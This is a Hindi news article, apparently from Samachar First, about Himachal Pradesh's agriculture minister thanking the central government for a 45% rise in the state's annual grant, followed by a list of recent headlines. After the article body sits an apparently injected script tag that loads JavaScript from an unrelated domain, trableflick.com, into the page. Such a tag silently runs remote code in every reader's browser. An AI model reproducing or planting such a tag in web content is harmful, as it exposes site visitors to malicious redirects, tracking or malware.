प्रदेश के वार्षिक अनुदान में 45 फ़ीसदी वृद्धि, मार्कंडेय ने PM मोदी और मोदी वित्त मंत्री निर्मला सीतारमण का जताया आभार

<p>केंद्र सरकार द्वारा हिमाचल प्रदेश के वार्षिक अनुदान में 45 फ़ीसदी की वृद्धि के लिए कृषि मंत्री डॉ राम लाल मारकंडा ने भारत सरकार के प्रधानमंत्री नरेंद्र मोदी वित्त मंत्री निर्मला सीतारमण और समस्त केंद्रीय नेतृत्व का आभार जताया है। डॉ राम लाल मारकंडा ने कहा हिमाचल प्रदेश के मुख्यमंत्री जयराम ठाकुर का भी विशेष धन्यवाद किया है। क्योंकि 15वें वित्त आयोग&nbsp; और केंद्र सरकार के सामने मुख्यमंत्री के नेतृत्व में प्रदेश सरकार ने सफलतापूर्वक तरीके से अपनी मांगों को रखा।</p>

<p>इसी के चलते केंद्र सरकार ने पहली बार प्रदेश के वार्षिक अनुदान में 45 फ़ीसदी की वृद्धि की है।&nbsp; हम 15वें वित्त आयोग के भी आभारी हैं। कृषि मंत्री डॉ रामलाल मार्कंडेय ने कहा पड़ोसी राज्यों की अपेक्षा हिमाचल प्रदेश को सबसे अधिक अनुदान मिला है। प्राकृतिक खेती के लिए विशेष बजट का प्रावधान किया गया है।</p>

<p>2022 तक हिमाचल प्रदेश के किसानों की आय को दोगुना करने का लक्ष्य रखा गया है। हिमाचल सरकार इस लक्ष्य को पूरा करने में लगी है। यही नहीं प्राकृतिक खेती में हज़ारों किसानों को ट्रेंड किया जा रहा है। इसी के कारण अब हिमाचल में प्राकृतिक खेती को अपनाने वाले किसानों की संख्या में दिन प्रतिदिन इजाफा होता जा रहा है।&nbsp;</p>

<p>उन्होंने कहा कि इस जहरमुक्त प्राकृतिक खेती को एक मिशन के तौर पर लिया जा रहा है और इसे एक जन आंदोलन के तौर पर प्रदेश में शुरू किया गया है। हिमाचल का अनुदान बढ़ने से जन लुभावनी योजनाओं को ओर व्यापक तरीके से जनता तक पहुंचाया जाएगा ।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

रेणुका विधानसभा क्षेत्र को उप मुख्यमंत्री का तोहफा, 2.40 करोड़ के विकास कार्यों का शुभारंभ

नाहन। उप मुख्यमंत्री मुकेश अग्निहोत्री ने आज जिला सिरमौर के श्री रेणुका जी विधान सभा…

3 hours ago

जानें कौन सी योजना देगी 1% ब्याज पर 20 लाख का शिक्षा ऋण

  Shimla: डॉ. वाईएस परमार ऋण योजना को सुक्‍खू सरकार ने विस्‍तार दिया है। योजना…

4 hours ago

28 सितंबर को शांतिपूर्ण प्रदर्शन, फैसला न आने पर जेल भरो आंदोलन

  Shimla: संजौली अवैध मस्जिद विवाद शांत नहीं हुआ है। 28 सितंबर को देवभूमि संघर्ष…

4 hours ago

कंगना का कांग्रेस पर करारा वार: कांग्रेस को बच्चे पालने का शौक, पप्पू और बहन की हरकतें बचकानी

  Mandi: मंडी के गोहर में एक कार्यक्रम में सांसद कंगना ने कांग्रेस के शीर्ष…

5 hours ago

पीएम मोदी कर रहे बदनाम, हिमाचलआर्थिक तंगी से नहीं जूझ रहा: डिप्टी सीएम

  Sirmour: उपमुख्यमंत्री मुकेश अग्निहोत्री ने आरोप लगाया है कि भाजपा के केंद्रीय व प्रदेश…

6 hours ago

स्वच्छ रहेगा घर, नगर व पंचायत तभी तो स्वस्थ रहेगा इंसान: उषा बिरला

  Hamirpur: ग्राम पंचायत दडूही में सोमवार को स्वच्छ भारत मिशन के तहत स्वच्छता पखवाड़ा…

6 hours ago